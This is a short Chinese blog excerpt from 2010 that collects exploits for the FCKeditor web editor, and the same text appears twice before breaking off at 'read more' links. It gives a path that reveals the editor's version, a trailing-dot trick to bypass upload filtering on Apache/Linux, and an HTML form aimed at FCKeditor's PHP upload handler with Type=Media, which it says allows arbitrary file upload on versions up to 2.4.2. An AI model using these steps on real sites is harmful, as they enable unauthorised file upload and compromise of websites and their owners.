English Sentence Loading...
英语句子加载中...
Fckeditor 漏洞利用合集 [转]
[ 2010-08-28 19:49:18 | 作者: 璀璨年华 ]
1.查看编辑器版本
FCKeditor/_whatsnew.html
2.Version 2.2 版本
Apache+linux 环境下在上传文件后面加个.突破!测试通过。
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.xxx.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
...
阅读全文...
FCKeditor/_whatsnew.html
2.Version 2.2 版本
Apache+linux 环境下在上传文件后面加个.突破!测试通过。
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.xxx.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
...
阅读全文...
1